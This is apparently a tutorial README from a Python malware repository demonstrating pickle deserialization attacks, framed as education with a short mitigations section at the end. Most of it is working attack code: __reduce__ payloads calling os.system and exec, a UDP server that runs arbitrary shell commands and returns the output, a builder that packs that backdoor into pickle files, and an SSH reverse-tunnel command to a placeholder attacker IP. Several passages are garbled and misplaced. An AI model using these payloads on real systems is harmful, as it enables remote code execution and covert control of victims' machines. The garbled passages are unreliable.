pickle
We will follow 3 steps with the program code to show how Deserialization Attacks Work:
-
[ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process has in the incoming data.
-
[ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
-
[ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.
# Created: 2024/07/06
# Version: v0.1.1
# Copyright: Copyright (c) 2024 LiuYuancheng
# License: MIT License
Introduction
Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. There are several Common Vulnerabilities and Exploits (CVEs) related the Python pickle
Deserialization Vulnerabilities:
-
CVE-2011-3389: Untrusted data passed to
pickle
deserialization can execute arbitrary code. -
CVE-2019-5021: The
pickle
module in Python is vulnerable to arbitrary code execution due to unsafe deserialization. -
CVE-2018-1000802: A deserialization vulnerability in the
pickle
module can be exploited to execute arbitrary code. -
CVE-2019-9636: Insecure loading of a
pickle
-based format in the Pandas library can lead to arbitrary code execution. -
CVE-2019-20907: Improper handling of serialized data leading to potential arbitrary code execution.
-
CVE-2024-34997: critical deserialization vulnerability identified in joblib version 1.4.2, specifically in the
NumpyArrayWrapper().read_array()
component within thejoblib.numpy_pickle
module.
Introduction of Python Data Serialization
In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:
# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
'Timestamp': '2023-04-05 16:00:00',
'IoTData': {
'IP': '172.23.155.209',
'Port': 3001,
'value': [1.2, 1.3, 1.4],
'RptPeer': {
'Hub1': 1.2,
'Hub2': 1.3
},
'CfgSet': set(['CT100', 'COM3', 3]) # set data is not support by json
}
})
import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)
Introduction of Python Deserialization Vulnerabilities
While using the Python pickle
module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk:
# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
if choice == '1':
orignalData = None
with open('data.pkl', 'rb') as fh:
orignalData = pickle.load(fh)
print(orignalData)
elif choice == '2':
dataStr = None
with open('data.txt', 'r') as fh:
dataStr = fh.read()
orignalData = pickle.loads(base64.b64decode(dataStr))
print(orignalData)
else:
print("Exit....")
exit()
To build a simple Python pickle bomb, we can over write the __reduce__()
method to return the os.system
function with a command string. This way, when the data loader reads the data file, it will execute the command:
import os
import pickle
import base64
# a simple picle bomb to run command
class PickleCmd:
def __reduce__(self):
cmd = ('uname -a')
return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
Build Python Pickle Boom
In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.
Clarification on Command Execution
Before we proceed, it's important to clarify how commands can be executed within the __reduce__()
function. Consider the following modification:
class PickleCmd:
def __reduce__(self):
os.system('date')
os.system('ifconfig')
with open('testfile.txt', 'w') as fh:
fh.write("Test file contents")
cmd = ('uname -a')
return os.system, (cmd,)
If we reload the new pickle bomb, you can see that the additional commands are not executed:
cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')
exec()
function. The exec()
Improving the Pickle Bomb Program
Let's improve our pickle bomb program to return the exec
function and a piece of Python code in the __reduce__()
function:
import pickle
import base64
codeContent="""
with open('testfile.txt', 'w') as fh:
fh.write("Test file contents")
"""
# a simple picle bomb to run command
class PickleCode:
def __reduce__(self):
return exec, (codeContent,)
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
After loading the data file, you will see that the Python code to create a file is executed:
exec()
Building a More Complex Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.
Here is the UDP server program:
# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
data, address = udpServer.recvfrom(BUFFER_SZ)
cmdMsg = data.decode('utf-8')
if cmdMsg == '': continue
if cmdMsg == 'exit': exit()
result = 'Command not found!'
try:
result = subprocess.check_output(cmdMsg, shell=True).decode()
except Exception as err:
result = str(err)
udpServer.sendto(result.encode('utf-8'), address)
Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:
# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64
# Serilized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None
with open(fileName, 'r') as fh:
dataStr = fh.read()
class PickleBomb:
def __reduce__(self):
pass
return exec, (dataStr,)
obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:
We can then use a simple UDP client program to connect to the victim's IP address and run commands:
As shown, we can check the folder structure and network information of the victim.
Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.
Demo Setup and Execution
For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:
https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb
Development/Execution Environment
-
python 3.7.4+
Additional Lib/Software Need : N.A
Program Files List
Program File | Execution Env | Description |
---|---|---|
pickleBombBuilder.py | python 3 | Program to covert a executable python program to a byte/text format serialized data file ( pickle bomb file) . |
pickleBombLoader.py | python 3 | Program to demo load the byte or text format serialized data and triggered the pickle bomb. |
simplepickleCmdRun.py | python 3 | A simple execution command pickle bomb create script. |
simplepickleCodeRun.py | python 3 | A simple python code pickle bomb create script. |
udpCmdServer.py | python 3 | A normal UDP server host on port 3000 accept different UDP client connection |
udpCom.py | python 3 | A UDP communication lib provide the UDP client program. |
data.txt | Text format pickle bomb file | |
data.pkl | Bytes format pickle bomb file |
For the below section to create and demo the Python deserialization attack
Run the pickle bomb builder
Copy the python execution file ( for example udpCmdServer.py
) with the same folder of the pickleBombBuilder.py, run the build with cmd:
python pickleBombBuilder.py -f udpCmdServer.py
-c : build cmd bomb: python pickleBombBuilder.py -c <Command string>
-f : build code bomb: python pickleBombBuilder.py -f <Python program file name>
-h : help
Then the bytes format pickle bomb data.pkl
and text format pickle bomb file data.txt
will be created.
Run the pickle bomb loader
Copy the pickle file you want to deserialize in the same folder then run the loader:
python pickleBombLoader.py
Connect to the UDP command execution server
When the UDP command exaction server pickle bomb activated, run the UDP Communication module and select the UDP client function, then input the victim IP address and port 3000. After connected, type in the command and the command will be sent to the pickle bomb and the execution result will be retrieved and show on the client.
python udpCom.py
Mitigations of Python Deserialization Attack
To avoid the Python Deserialization Attack happen, there are several points we can follow:
-
Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
-
Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
-
Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
-
Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
Conclusion and Reference
Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle
. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.
Reference: